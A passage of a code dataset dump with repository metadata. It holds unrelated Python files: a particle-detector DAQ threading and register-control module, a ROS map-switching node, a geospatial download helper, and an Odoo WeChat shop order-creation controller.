2550136832: continue # got a Filler\r\n binary = format(int(mem_data), '032b')\r\n if(not self.skip_binary):\r\n if(self.compressed_binary): outfile.write('%d\\n'%int(mem_data))\r\n else: outfile.write('%s\\n'%binary)\r\n # Increment line counters\r\n file_lines = file_lines + 1\r\n # Perform translation related activities if requested\r\n if(self.make_plots or (not self.binary_only)):\r\n self.translate_queue.put(binary)\r\n if self.write_thread_handle.is_set():\r\n # print(\"Write Thread received STOP signal\")\r\n if not self.translate_thread_handle.is_set():\r\n print(\"Sending stop signal to Translate Thread\")\r\n self.translate_thread_handle.set()\r\n # print(\"Checking Read Thread from Write Thread\")\r\n # wait for read thread to die...\r\n # while(self.read_thread_handle.is_set() == False):\r\n # time.sleep(1)\r\n # self.is_alive = False\r\n print(\"Write Thread gracefully sending STOP signal to translate thread\") \r\n self.translate_thread_handle.set()\r\n self.write_thread_handle.set()\r\n # self.is_alive = False\r\n print(\"%s finished!\"%self.getName())\r\n\r\n#--------------------------------------------------------------------------#\r\nclass Translate_data(threading.Thread):\r\n def __init__(self, name, translate_queue, plot_queue, cmd_interpret, num_line, timestamp, store_dict, binary_only, make_plots, board_ID, write_thread_handle, translate_thread_handle, plotting_thread_handle, compressed_translation, stop_DAQ_event = None):\r\n threading.Thread.__init__(self, name=name)\r\n self.translate_queue = translate_queue\r\n self.plot_queue = plot_queue\r\n self.cmd_interpret = cmd_interpret\r\n self.num_line = num_line\r\n self.timestamp = timestamp\r\n self.store_dict = store_dict\r\n self.binary_only = binary_only\r\n self.make_plots = make_plots\r\n self.board_ID = board_ID\r\n self.queue_ch = [deque() for i in range(4)]\r\n self.link_ch = [\"\" for i in range(4)]\r\n self.write_thread_handle = write_thread_handle\r\n self.translate_thread_handle = translate_thread_handle\r\n self.plotting_thread_handle = plotting_thread_handle\r\n self.stop_DAQ_event = stop_DAQ_event\r\n self.hitmap = {i:np.zeros((16,16)) for i in range(4)}\r\n self.compressed_translation = compressed_translation\r\n # self.is_alive = False\r\n\r\n # def check_alive(self):\r\n # return self.is_alive\r\n\r\n def run(self):\r\n t = threading.current_thread()\r\n t.alive = True\r\n # self.is_alive = True\r\n total_lines = 0\r\n file_lines = 0\r\n file_counter = 0\r\n if(not self.binary_only): \r\n outfile = open(\"./%s/TDC_Data_translated_%d.dat\"%(self.store_dict, file_counter), 'w')\r\n print(\"{} is reading queue and translating file {}...\".format(self.getName(), file_counter))\r\n else:\r\n print(\"{} is reading queue and translating...\".format(self.getName()))\r\n retry_count = 0\r\n while True:\r\n if not t.alive:\r\n print(\"Translate Thread detected alive=False\")\r\n if(not self.binary_only): outfile.close()\r\n # self.is_alive = False\r\n break \r\n # if self.translate_thread_handle.is_set():\r\n # print(\"Translate Thread received STOP signal from Write Thread\")\r\n # if(not self.binary_only): outfile.close()\r\n # break\r\n if((not self.binary_only) and file_lines>self.num_line):\r\n outfile.close()\r\n file_lines=0\r\n file_counter = file_counter + 1\r\n outfile = open(\"./%s/TDC_Data_translated_%d.dat\"%(self.store_dict, file_counter), 'w')\r\n print(\"{} is reading queue and translating file {}...\".format(self.getName(), file_counter))\r\n binary = \"\"\r\n # Attempt to pop off the translate_queue for 30 secs, fail if nothing found\r\n try:\r\n binary = self.translate_queue.get(True, 1)\r\n retry_count = 0\r\n except queue.Empty:\r\n if not self.stop_DAQ_event.is_set:\r\n retry_count = 0\r\n continue\r\n if self.translate_thread_handle.is_set():\r\n print(\"Translate Thread received STOP signal AND ran out of data to translate\")\r\n break\r\n retry_count += 1\r\n if retry_count < 30:\r\n continue\r\n print(\"BREAKING OUT OF TRANSLATE LOOP CAUSE I'VE WAITING HERE FOR 30s SINCE LAST FETCH FROM TRANSLATE_QUEUE!!! THIS SENDS STOP SIGNAL TO ALL THREADS!!!\")\r\n # self.read_write_handle.set()\r\n # self.is_alive = False\r\n break\r\n TDC_data, write_flag = etroc_translate_binary(binary, self.timestamp, self.queue_ch, self.link_ch, self.board_ID, self.hitmap, self.compressed_translation)\r\n if(write_flag==1):\r\n pass\r\n # if(not self.binary_only): \r\n # outfile.write(\"%s\\n\"%TDC_data)\r\n # file_lines = file_lines + 1\r\n # total_lines = total_lines + 1\r\n # if(TDC_data[0:6]=='ETROC1'):\r\n # if(self.make_plots): self.plot_queue.put(TDC_data)\r\n elif(write_flag==2):\r\n TDC_len = len(TDC_data)\r\n TDC_header_index = -1\r\n for j,TDC_line in enumerate(TDC_data):\r\n if(TDC_line==\"HEADER_KEY\"):\r\n if(TDC_header_index<0):\r\n TDC_header_index = j\r\n else:\r\n print(\"ERROR! Found more than two headers in data block!!\")\r\n sys.exit(1)\r\n continue\r\n if(not self.binary_only): \r\n if(self.compressed_translation):\r\n if(TDC_header_index<0):\r\n pass\r\n else:\r\n outfile.write(\"%s\\n\"%TDC_line)\r\n else:\r\n outfile.write(\"%s\\n\"%TDC_line)\r\n if(TDC_line[9:13]!='DATA'): continue\r\n if(self.make_plots): self.plot_queue.put(TDC_line)\r\n if(TDC_len>0):\r\n if(not self.binary_only): file_lines = file_lines + TDC_len - 1\r\n total_lines = total_lines + (TDC_len-1)\r\n if self.translate_thread_handle.is_set():\r\n # print(\"Translate Thread received STOP signal\")\r\n if not self.plotting_thread_handle.is_set():\r\n print(\"Sending stop signal to Plotting Thread\")\r\n self.plotting_thread_handle.set()\r\n # print(\"Checking Write Thread from Translate Thread\")\r\n # wait for write thread to die...\r\n # while(self.write_thread_handle.is_set() == False):\r\n # time.sleep(1)\r\n # self.is_alive = False\r\n # break\r\n \r\n print(\"Translate Thread gracefully sending STOP signal to plotting thread\") \r\n self.translate_thread_handle.set()\r\n self.plotting_thread_handle.set()\r\n # self.is_alive = False\r\n print(\"%s finished!\"%self.getName())\r\n\r\n#--------------------------------------------------------------------------#\r\nclass DAQ_Plotting(threading.Thread):\r\n def __init__(self, name, queue, timestamp, store_dict, pixel_address, board_type, board_size, plot_queue_time, translate_thread_handle, plotting_thread_handle):\r\n threading.Thread.__init__(self, name=name)\r\n self.queue = queue\r\n self.timestamp = timestamp\r\n self.store_dict = store_dict\r\n self.pixel_address = pixel_address\r\n self.board_type = board_type\r\n self.board_size = board_size\r\n self.plot_queue_time = plot_queue_time\r\n self.translate_thread_handle = translate_thread_handle\r\n self.plotting_thread_handle = plotting_thread_handle\r\n # self.is_alive = False\r\n\r\n def run(self):\r\n t = threading.current_thread()\r\n t.alive = True\r\n # self.is_alive = True\r\n\r\n ch0 = np.zeros((int(np.sqrt(self.board_size[0])),int(np.sqrt(self.board_size[0])))) \r\n ch1 = np.zeros((int(np.sqrt(self.board_size[1])),int(np.sqrt(self.board_size[1])))) \r\n ch2 = np.zeros((int(np.sqrt(self.board_size[2])),int(np.sqrt(self.board_size[2])))) \r\n ch3 = np.zeros((int(np.sqrt(self.board_size[3])),int(np.sqrt(self.board_size[3])))) \r\n\r\n plt.ion()\r\n # fig, ((ax0, ax1), (ax2, ax3)) = plt.subplots(2,2, dpi=75)\r\n fig = plt.figure(dpi=75, figsize=(5,5))\r\n gs = fig.add_gridspec(8,8)\r\n ax0 = fig.add_subplot(gs[0:int(np.sqrt(self.board_size[0]))//4, 0:int(np.sqrt(self.board_size[0]))//4])\r\n ax1 = fig.add_subplot(gs[4:4+int(np.sqrt(self.board_size[1]))//4, 0:int(np.sqrt(self.board_size[1]))//4])\r\n ax2 = fig.add_subplot(gs[0:int(np.sqrt(self.board_size[2]))//4, 4:4+int(np.sqrt(self.board_size[2]))//4])\r\n ax3 = fig.add_subplot(gs[4:4+int(np.sqrt(self.board_size[3]))//4, 4:4+int(np.sqrt(self.board_size[3]))//4])\r\n\r\n if(len(self.board_type)>0):\r\n ax0.set_title('Channel 0: ETROC {:d}'.format(self.board_type[0])) \r\n if(len(self.board_type)>1):\r\n ax1.set_title('Channel 1: ETROC {:d}'.format(self.board_type[1]))\r\n if(len(self.board_type)>2):\r\n ax2.set_title('Channel 2: ETROC {:d}'.format(self.board_type[2]))\r\n if(len(self.board_type)>3):\r\n ax3.set_title('Channel 3: ETROC {:d}'.format(self.board_type[3]))\r\n \r\n img0 = ax0.imshow(ch0, interpolation='none', vmin=1)\r\n ax0.set_aspect('equal')\r\n img1 = ax1.imshow(ch1, interpolation='none', vmin=1)\r\n ax1.set_aspect('equal')\r\n img2 = ax2.imshow(ch2, interpolation='none', vmin=1)\r\n ax2.set_aspect('equal')\r\n img3 = ax3.imshow(ch3, interpolation='none', vmin=1)\r\n ax3.set_aspect('equal')\r\n\r\n ax0.get_xaxis().set_visible(False)\r\n ax0.get_yaxis().set_visible(False)\r\n # ax0.set_frame_on(False)\r\n ax1.get_xaxis().set_visible(False)\r\n ax1.get_yaxis().set_visible(False)\r\n # ax1.set_frame_on(False)\r\n ax2.get_xaxis().set_visible(False)\r\n ax2.get_yaxis().set_visible(False)\r\n # ax2.set_frame_on(False)\r\n ax3.get_xaxis().set_visible(False)\r\n ax3.get_yaxis().set_visible(False)\r\n # ax3.set_frame_on(False)\r\n\r\n divider = make_axes_locatable(ax0)\r\n cax = divider.append_axes('right', size='5%', pad=0.05)\r\n fig.colorbar(img0, cax=cax, orientation='vertical')\r\n divider = make_axes_locatable(ax1)\r\n cax = divider.append_axes('right', size='5%', pad=0.05)\r\n fig.colorbar(img1, cax=cax, orientation='vertical')\r\n divider = make_axes_locatable(ax2)\r\n cax = divider.append_axes('right', size='5%', pad=0.05)\r\n fig.colorbar(img2, cax=cax, orientation='vertical')\r\n divider = make_axes_locatable(ax3)\r\n cax = divider.append_axes('right', size='5%', pad=0.05)\r\n fig.colorbar(img3, cax=cax, orientation='vertical')\r\n\r\n # plt.tight_layout()\r\n # plt.draw()\r\n # def init():etroc_translate_binary\r\n # line.set_data([], [])\r\n # return line,\r\n # def animate(i):\r\n # x = np.linspace(0, 4, 1000)\r\n # y = np.sin(2 * np.pi * (x - 0.01 * i))\r\n # line.set_data(x, y)\r\n # return line,\r\n # anim = FuncAnimation(fig, animate, init_func=init,\r\n # frames=200, interval=20, blit=False)\r\n # anim.save('sine_wave.gif', writer='imagemagick')\r\n\r\n while(True):\r\n ch0 = np.zeros((int(np.sqrt(self.board_size[0])),int(np.sqrt(self.board_size[0])))) \r\n ch1 = np.zeros((int(np.sqrt(self.board_size[1])),int(np.sqrt(self.board_size[1])))) \r\n ch2 = np.zeros((int(np.sqrt(self.board_size[2])),int(np.sqrt(self.board_size[2])))) \r\n ch3 = np.zeros((int(np.sqrt(self.board_size[3])),int(np.sqrt(self.board_size[3])))) \r\n img0.set_data(ch0)\r\n img0.autoscale()\r\n img1.set_data(ch1)\r\n img1.autoscale()\r\n img2.set_data(ch2)\r\n img2.autoscale()\r\n img3.set_data(ch3)\r\n img3.autoscale()\r\n if not t.alive:\r\n print(\"Plotting Thread detected alive=False\")\r\n # self.is_alive = False\r\n break\r\n if self.plotting_thread_handle.is_set():\r\n print(\"Plot Thread received STOP signal from Translate Thread\")\r\n # wait for translate thread to die...\r\n # while(self.translate_thread_handle.is_set() == False):\r\n # time.sleep(1)\r\n # self.is_alive = False\r\n break\r\n start_time = time.time()\r\n delta_time = 0\r\n mem_data = []\r\n while(delta_time < self.plot_queue_time):\r\n try:\r\n task = self.queue.get(False) # Empty exception is thrown right away\r\n mem_data.append(task)\r\n except queue.Empty: # Handle empty queue here\r\n pass\r\n # else: # Handle task here and call q.task_done()\r\n delta_time = time.time() - start_time\r\n\r\n for line in mem_data:\r\n words = line.split()\r\n if(words[0]==\"ETROC1\"):\r\n if(words[1]==\"0\"): ch0[(self.pixel_address[0]%4),self.pixel_address[0]//4] += 1\r\n elif(words[1]==\"1\"): ch1[(self.pixel_address[1]%4),self.pixel_address[1]//4] += 1\r\n elif(words[1]==\"2\"): ch2[(self.pixel_address[2]%4),self.pixel_address[2]//4] += 1\r\n elif(words[1]==\"3\"): ch3[(self.pixel_address[3]%4),self.pixel_address[3]//4] += 1\r\n elif(words[0]==\"ETROC2\"):\r\n if(words[2]!=\"DATA\"): continue\r\n if(words[1]==\"0\"): ch0[15-int(words[8]),15-int(words[6])] += 1\r\n elif(words[1]==\"1\"): ch1[15-int(words[8]),15-int(words[6])] += 1\r\n elif(words[1]==\"2\"): ch2[15-int(words[8]),15-int(words[6])] += 1\r\n elif(words[1]==\"3\"): ch3[15-int(words[8]),15-int(words[6])] += 1\r\n elif(words[0]==\"ETROC3\"): continue\r\n else: continue\r\n\r\n img0.set_data(ch0)\r\n img0.autoscale()\r\n img1.set_data(ch1)\r\n img1.autoscale()\r\n img2.set_data(ch2)\r\n img2.autoscale()\r\n img3.set_data(ch3)\r\n img3.autoscale()\r\n # ax0.relim()\r\n # ax0.autoscale_view()\r\n # ax1.relim()\r\n # ax1.autoscale_view()\r\n # ax2.relim()\r\n # ax2.autoscale_view()\r\n # ax3.relim()\r\n # ax3.autoscale_view()\r\n # plt.tight_layout()\r\n fig.canvas.draw_idle()\r\n plt.pause(0.01)\r\n print(\"This pass of the Plotting function loop parsed {:d} lines of output\".format(len(mem_data)))\r\n\r\n plt.ioff()\r\n plt.show()\r\n\r\n # Thread then stops running\r\n # self.is_alive = False\r\n print(\"Plotting Thread broke out of loop\")\r\n\r\n\r\n#--------------------------------------------------------------------------#\r\n\r\n## IIC write slave device\r\n# @param mode[1:0] : '0'is 1 bytes read or wirte, '1' is 2 bytes read or write, '2' is 3 bytes read or write\r\n# @param slave[7:0] : slave device address\r\n# @param wr: 1-bit '0' is write, '1' is read\r\n# @param reg_addr[7:0] : register address\r\n# @param data[7:0] : 8-bit write data\r\ndef iic_write(mode, slave_addr, wr, reg_addr, data, cmd_interpret):\r\n val = mode << 24 | slave_addr << 17 | wr << 16 | reg_addr << 8 | data\r\n cmd_interpret.write_config_reg(4, 0xffff & val)\r\n cmd_interpret.write_config_reg(5, 0xffff & (val>>16))\r\n time.sleep(0.01)\r\n cmd_interpret.write_pulse_reg(0x0001) # reset ddr3 data fifo\r\n time.sleep(0.01)\r\n\r\n#--------------------------------------------------------------------------#\r\n## IIC read slave device\r\n# @param mode[1:0] : '0'is 1 bytes read or wirte, '1' is 2 bytes read or write, '2' is 3 bytes read or write\r\n# @param slave[6:0]: slave device address\r\n# @param wr: 1-bit '0' is write, '1' is read\r\n# @param reg_addr[7:0] : register address\r\ndef iic_read(mode, slave_addr, wr, reg_addr, cmd_interpret):\r\n val = mode << 24 | slave_addr << 17 | 0 << 16 | reg_addr << 8 | 0x00\t # write device addr and reg addr\r\n cmd_interpret.write_config_reg(4, 0xffff & val)\r\n cmd_interpret.write_config_reg(5, 0xffff & (val>>16))\r\n time.sleep(0.01)\r\n cmd_interpret.write_pulse_reg(0x0001)\t\t\t\t # Sent a pulse to IIC module\r\n\r\n val = mode << 24 | slave_addr << 17 | wr << 16 | reg_addr << 8 | 0x00\t # write device addr and read one byte\r\n cmd_interpret.write_config_reg(4, 0xffff & val)\r\n cmd_interpret.write_config_reg(5, 0xffff & (val>>16))\r\n time.sleep(0.01)\r\n cmd_interpret.write_pulse_reg(0x0001)\t\t\t\t # Sent a pulse to IIC module\r\n time.sleep(0.01)\t\t\t\t\t\t\t\t\t # delay 10ns then to read data\r\n return cmd_interpret.read_status_reg(0) & 0xff\r\n#--------------------------------------------------------------------------#\r\n## Enable FPGA Descrambler\r\ndef Enable_FPGA_Descramblber(cmd_interpret, val=0x000b):\r\n # 0xWXYZ\r\n # Z is a bit 4 bit binary wxyz\r\n # z is the enable descrambler\r\n # y is disable GTX\r\n # x is polarity\r\n# w is the memo FC (active high)\r\n cmd_interpret.write_config_reg(14, val)\r\n\r\n#--------------------------------------------------------------------------#\r\n## simple readout fucntion\r\n#@param[in]: write_num: BC0 and L1ACC loop number, 0-65535\r\ndef simple_readout(write_num, cmd_interpret):\r\n cmd_interpret.write_config_reg(15, 0xffff & write_num) # write enable\r\n cmd_interpret.write_pulse_reg(0x0080) # trigger pulser_reg[7]\r\n\r\n#--------------------------------------------------------------------------#\r\n## software clear fifo\r\ndef software_clear_fifo(cmd_interpret):\r\n cmd_interpret.write_pulse_reg(0x0002) # trigger pulser_reg[1]\r\n\r\n#--------------------------------------------------------------------------#\r\n## software clear error\r\ndef software_clear_error(cmd_interpret):\r\n cmd_interpret.write_pulse_reg(0x0006) # trigger pulser_reg[5]\r\n\r\n#--------------------------------------------------------------------------#\r\n## Register 15\r\n## Enable channel\r\n## 4 bit binary, WXYZ\r\n## W - ch3\r\n## X - ch2\r\n## Y - ch1\r\n## Z - ch0\r\n## Note that the input needs to be a 4-digit 16 bit hex, 0x000(WXYZ)\r\ndef active_channels(cmd_interpret, key = 0x0003): \r\n cmd_interpret.write_config_reg(15, key)\r\n\r\n#--------------------------------------------------------------------------#\r\n## Register 13\r\n## TimeStamp and Testmode\r\n## Following is binary key, 4 bit binary WXYZ\r\n## 0000: Enable Testmode & Enable TimeStamp\r\n## 0001: Enable Testmode & Disable TimeStamp\r\n## 0010: Disable Testmode & Enable TimeStamp\r\n## 0011: Disable Testmode & Disable TimeStamp ##BUGGED as of 03-04-2023\r\n## Note that the input needs to be a 4-digit 16 bit hex, 0x000(WXYZ)\r\ndef timestamp(cmd_interpret, key=0x0000):\r\n cmd_interpret.write_config_reg(13, key)\r\n\r\n#--------------------------------------------------------------------------#\r\n## Register 12\r\n## 4-digit 16 bit hex, 0xWXYZ\r\n## WX (8 bit) - Duration\r\n## Y - N/A,N/A,Period,Hold\r\n## Z - Input command\r\ndef register_12(cmd_interpret, key = 0x0000): \r\n cmd_interpret.write_config_reg(12, key)\r\n\r\n#--------------------------------------------------------------------------#\r\n## Register 11\r\n## 4-digit 16 bit hex, 0xWXYZ\r\n## WX (8 bit) - N/A\r\n## YZ (8 bit) - Error Mask\r\ndef register_11(cmd_interpret, key = 0x0000): \r\n cmd_interpret.write_config_reg(11, key)\r\n\r\n#--------------------------------------------------------------------------#\r\n## Register 8\r\n## 4-digit 16 bit hex\r\n## LSB 10 bits are delay, LSB 11th bit is delay enabled\r\n## 0000||0100||0000||0000 = 0x0400: shift of one clock cycle\r\ndef triggerBitDelay(cmd_interpret, key = 0x0400): \r\n cmd_interpret.write_config_reg(8, key)\r\n\r\n#--------------------------------------------------------------------------#\r\n## Register 7\r\n## 4-digit 16 bit hex\r\n## LSB 6 bits - time (s) for FPGA counters\r\ndef counterDuration(cmd_interpret, key = 0x0005): \r\n cmd_interpret.write_config_reg(7, key)\r\n\r\n#--------------------------------------------------------------------------#\r\n## Fast Command Signal Start\r\ndef fc_signal_start(cmd_interpret):\r\n cmd_interpret.write_pulse_reg(0x0004)\r\n\r\n#--------------------------------------------------------------------------#\r\n## Fast Command Initialize pulse\r\n## MSB..10000\r\ndef fc_init_pulse(cmd_interpret):\r\n cmd_interpret.write_pulse_reg(0x0010)\r\n","repo_name":"CMS-ETROC/ETROC-DAQ","sub_path":"daq_helpers.py","file_name":"daq_helpers.py","file_ext":"py","file_size_in_byte":43681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"41133579843","text":"#!/usr/bin/env python3\nimport rospy\nimport ruamel.yaml\nfrom pathlib import Path\nfrom std_msgs.msg import UInt16\nfrom std_srvs.srv import Empty, Trigger\nfrom nav_msgs.srv import LoadMap\n\n\nNODE_NAME = \"map_changer\"\n\n\nclass MultiMapChanger:\n def __init__(self):\n yaml = ruamel.yaml.YAML()\n ## Read multimaps directory\n self.multimap_dir = rospy.get_param(NODE_NAME + \"/multi_map_dir\")\n self.multimap_dir = Path(self.multimap_dir).resolve()\n self.current_map_num = 0\n ## Read waypoints file and change point number\n self.change_point_num = []\n self.next_map_idx = []\n waypoints_path = rospy.get_param(NODE_NAME + \"/waypoints_file\")\n with open(waypoints_path) as file:\n waypoints_yaml = yaml.load(file)\n for i, data in enumerate(waypoints_yaml[\"waypoints\"]):\n if \"change_map\" in data[\"point\"]:\n self.change_point_num.append(i + 2)\n self.next_map_idx.append(data[\"point\"][\"change_map\"])\n ## Service clients\n self.change_map = rospy.ServiceProxy(\"/change_map\", LoadMap)\n self.amcl_update = rospy.ServiceProxy(\"/request_nomotion_update\", Empty)\n self.stop_nav = rospy.ServiceProxy(\"/stop_wp_nav\", Trigger)\n self.resume_nav = rospy.ServiceProxy(\"/resume_nav\", Trigger)\n ## Subscribe current waypoint number\n self.waypoint_num = 0\n self.wp_num_sub = rospy.Subscriber(\n \"/waypoint_num\", UInt16, self.waypoint_num_callback\n )\n return\n\n def waypoint_num_callback(self, msg):\n if msg.data == self.waypoint_num:\n return\n try:\n idx = self.change_point_num.index(msg.data)\n self.current_map_num = self.next_map_idx[idx]\n self.change_map_service_call()\n except ValueError:\n pass\n\n self.waypoint_num = msg.data\n return\n\n def change_map_service_call(self):\n self.stop_nav()\n rospy.sleep(0.5)\n self.update_amcl_call()\n rospy.wait_for_service(\"/change_map\")\n try:\n res = self.change_map(\n str(self.multimap_dir / Path(\"map{}.yaml\".format(self.current_map_num)))\n )\n if res.result == 0:\n rospy.loginfo(\"Successfully changed the map\")\n self.update_amcl_call()\n self.resume_nav()\n return True\n else:\n rospy.logerr(\"Failed to change the map: result=\", res.result)\n\n except rospy.ServiceException:\n rospy.logerr(\"Change map service call failed\")\n return False\n\n def update_amcl_call(self):\n rospy.wait_for_service(\"/request_nomotion_update\")\n for i in range(0, 5):\n self.amcl_update()\n rospy.sleep(0.5)\n rospy.loginfo(\"Update amcl pose 5 times\")\n\n\nif __name__ == \"__main__\":\n rospy.init_node(NODE_NAME)\n mmc = MultiMapChanger()\n rospy.spin()\n","repo_name":"KBKN-Autonomous-Robotics-Lab/multi_map_manager","sub_path":"map_changer/scripts/map_changer.py","file_name":"map_changer.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"65"} +{"seq_id":"43746040665","text":"import numpy as np\nimport urllib.request\nfrom zipfile import ZipFile\nimport os\n\nclass StudySite:\n def __init__(self, left, right, bottom, top):\n self.left = int(str(left)[:4])\n self.right = int(str(right)[:4])\n self.bottom = int(str(bottom)[:4])\n self.top = int(str(top)[:4])\n \n self.bounds = [left, right, bottom, top]\n self.crs = epsg_code\n \n links = np.genfromtxt('download_links.csv',dtype='/order/create',\n auth='public', methods=['POST'], csrf=False, type='http')\n def create(self, sub_domain, **kwargs):\n token = kwargs.pop('token', None)\n team_id = kwargs.pop('team', None)\n try:\n res, wechat_user, entry = self._check_user(sub_domain, token)\n if res:return res\n\n res = self.pre_check(entry, wechat_user, kwargs)\n if res:return res\n\n # [{\"goodsId\":1,\"number\":3,\"propertyChildIds\":\"1:1,2:4,\",\"logisticsType\":0, \"inviter_id\":0}]\n goods_json = json.loads(kwargs.pop('goodsJsonStr'))\n\n province_id = int(kwargs.pop('provinceId')) if kwargs.get('provinceId', 'false')!='false' else False\n city_id = int(kwargs.pop('cityId')) if kwargs.get('cityId', 'false')!='false' else False\n district_id = int(kwargs.pop('districtId')) if kwargs.get('districtId', 'false')!='false' else False\n addr_id = int(kwargs.pop('addrid')) if 'addrid' in kwargs else False\n zipcode = kwargs.pop('code') if 'code' in kwargs else False\n link_man = kwargs.pop('linkMan') if 'linkMan' in kwargs else False\n\n calculate = kwargs.pop('calculate', False)\n if calculate=='false':\n calculate = False\n remark = kwargs.pop('remark', '')\n\n goods_price, logistics_price, order_lines, isNeedLogistics = self.parse_goods_json(\n goods_json, province_id, city_id, district_id, calculate\n )\n if not addr_id:\n address = request.env(user=1)['res.partner'].search([\n ('parent_id', '=', wechat_user.partner_id.id),\n ('type', '=', 'delivery'),\n ('is_default', '=', True)\n ], limit=1)\n if address:\n addr_id = address.id\n\n order_dict = {\n 'zipcode': zipcode,\n 'partner_id': wechat_user.partner_id.id,\n 'number_goods': sum(map(lambda r: r['product_uom_qty'], order_lines)),\n 'logistics_price': logistics_price,\n 'province_id': province_id,\n 'city_id': city_id,\n 'district_id': district_id,\n 'team_id': team_id and int(team_id) or entry.team_id.id,\n 'note': remark,\n 'linkman': link_man,\n 'partner_shipping_id': addr_id or wechat_user.partner_id.id,\n 'user_id': wechat_user.partner_id.user_id.id,\n 'goods_price': goods_price,\n 'extra': {},\n 'entry': entry,\n }\n order_dict.update(kwargs)\n if kwargs.get('extraInfo'):\n try:\n extraInfo = json.loads(kwargs.get('extraInfo'))\n order_dict.update(extraInfo)\n except:\n import traceback;traceback.print_exc()\n order_dict['_params'] = {'calculate': calculate, 'isNeedLogistics': isNeedLogistics}\n order_dict['_params'].update(kwargs)\n _logger.info('>>> order_dict %s', order_dict)\n order_logistics = self.calculate_order_logistics(wechat_user, order_dict, order_lines)\n if order_logistics!=None:\n order_dict['logistics_price'] = order_logistics\n self.after_calculate(wechat_user, order_dict, order_lines)\n\n if calculate:\n _data = {\n 'score': order_dict.get('need_score', 0),\n 'isNeedLogistics': isNeedLogistics,\n 'amountTotle': round(order_dict['goods_price'], 2),\n 'amountLogistics': order_dict['logistics_price'],\n 'amountTax': order_dict.get('amount_tax', 0),\n 'extra': order_dict['extra']\n }\n _data['amountReal'] = _data['amountTotle'] + _data['amountLogistics'] + _data['amountTax']\n _data.update(self.calculate_ext_info(wechat_user, order_dict, order_lines, _data))\n for line in order_lines:\n line['price_unit'] = round(line['price_unit'], 2)\n _data['orderLines'] = order_lines\n _data['amountReal'] = round(_data['amountReal'], 2)\n else:\n OrderModel = request.env(user=1)['sale.order']\n user = self._get_user()\n if user:\n if release.version_info[0]>=14:\n OrderModel = OrderModel.with_company(user.company_id.id)\n else:\n OrderModel = OrderModel.with_context(force_company=user.company_id.id)\n order_dict.pop('goods_price')\n order_dict.pop('extra')\n order_dict.pop('_params')\n line_value_list = []\n for line in order_lines:\n if 'goods_id' in line:\n line.pop('goods_id')\n line_value_list.append((0, 0, line))\n if order_dict['logistics_price']>0:\n line_value_list.append((0, 0, {\n 'product_id': request.env.ref('oejia_weshop.product_product_delivery_weshop').id,\n 'price_unit': order_dict['logistics_price'],\n 'product_uom_qty': 1,\n }))\n order_dict['order_line'] = line_value_list\n _logger.info('>>> create order_line %s', order_dict['order_line'])\n vals = order_dict.copy()\n vals.pop('entry', None)\n order = OrderModel.create(vals)\n\n #mail_template = request.env.ref('wechat_mall_order_create')\n #mail_template.sudo().send_mail(order.id, force_send=True, raise_exception=False)\n if hasattr(order, 'action_accounted'):\n order.action_accounted(order_dict)\n order.action_created(order_dict)\n _data = {\n \"amountReal\": round(order.amount_total, 2),\n \"dateAdd\": dt_convert(order.create_date, gmt_diff=entry.gmt_diff),\n \"id\": order.id,\n \"orderNumber\": order.name,\n \"customer\": order.partner_id.name,\n \"status\": defs.OrderResponseStatus.attrs[order.customer_status],\n \"statusStr\": self.get_statusStr(order),\n }\n\n return self.res_ok(_data)\n\n except UserException as e:\n return self.res_err(-99, e.args[0])\n except Exception as e:\n _logger.exception(e)\n return self.res_err(-1, '%s'%e)\n\n def calculate_order_logistics(self, wechat_user, order_dict, order_lines):\n pass\n\n def after_calculate(self, wechat_user, order_dict, order_lines):\n pass\n\n def calculate_ext_info(self, wechat_user, order_dict, goods_list, init_info):\n return {}\n\n def parse_goods_json(self, goods_json, province_id, city_id, district_id, calculate):\n \"\"\"\n :param goods_json: dict\n :param province_id: 省\n :param city_id: 市\n :param district_id: 区\n :return: goods_fee, logistics_fee, order_lines\n \"\"\"\n # [{\"goodsId\":1,\"number\":3,\"propertyChildIds\":\"1:1,2:4,\",\"logisticsType\":0, \"inviter_id\":0}]\n goods_fee, logistics_fee = 0.0, 0.0\n order_lines = []\n\n goods_id_set = set(map(lambda r: r['goodsId'], goods_json))\n product_list = []\n for data in goods_json:\n rs = request.env['product.product'].sudo().search([\n ('product_tmpl_id', '=', data['goodsId']),\n ('attr_val_str', '=', data['propertyChildIds'])\n ])\n product_list += [p for p in rs]\n\n template_list = request.env['product.template'].sudo().search([\n ('id', 'in', list(goods_id_set)),\n ('wxapp_published', '=', True)\n ])\n template_dict = {template.id: template for template in template_list}\n\n if goods_id_set - set(template_dict.keys()):\n _ids = goods_id_set - set(template_dict.keys())\n _logger.info('>>> _ids %s', _ids)\n _name_list = [e.name for e in request.env['product.template'].sudo().search([('id', 'in', list(_ids))])]\n raise UserException(u'订单中包含已下架的商品: %s' % ','.join(_name_list))\n\n isNeedLogistics = 0\n for each_goods in goods_json:\n property_child_ids = each_goods.get('propertyChildIds')\n amount = each_goods['number']\n transport_type = each_goods['logisticsType']\n template = template_dict[each_goods['goodsId']]\n if template.type=='product':\n isNeedLogistics = 1\n\n each_goods_total, line_dict = self.calculate_goods_fee(template, amount, property_child_ids, calculate)\n order_lines.append(line_dict)\n goods_fee += each_goods_total\n each_logistics_price = self.calculate_logistics_fee(template, amount, transport_type, province_id, city_id, district_id)\n logistics_fee += each_logistics_price\n\n return goods_fee, logistics_fee, order_lines, isNeedLogistics\n\n def calculate_goods_fee(self, goods, amount, property_child_ids, calculate):\n _logger.info('>>> calculate_goods_fee %s %s %s', goods, amount, property_child_ids)\n property_str = ''\n\n if 1:#property_child_ids:\n property_child_ids = property_child_ids or ''\n product = request.env['product.product'].sudo().search([\n ('product_tmpl_id', '=', goods.id),\n ('attr_val_str', '=', property_child_ids)\n ])\n if not property_child_ids and not product:\n product = request.env['product.product'].sudo().search([\n ('product_tmpl_id', '=', goods.id),\n ('attr_val_str', '=', False)\n ])\n if not product:\n raise UserException(u'商品不存在!')\n\n price = product.get_present_price(amount)\n total = price * amount\n property_str = product.name\n\n stores = product.get_present_qty() - amount\n if not property_child_ids:\n stores = goods.get_present_qty() - amount\n\n if stores < 0:\n raise UserException(u'%s 库存不足!'%goods.name)\n if stores == 0:\n # todo 发送库存空预警\n pass\n if not calculate:\n product.sudo().change_qty(-amount)\n if not property_child_ids:\n goods.sudo().change_qty(-amount)\n\n line_dict = {\n 'product_id': product.id,\n 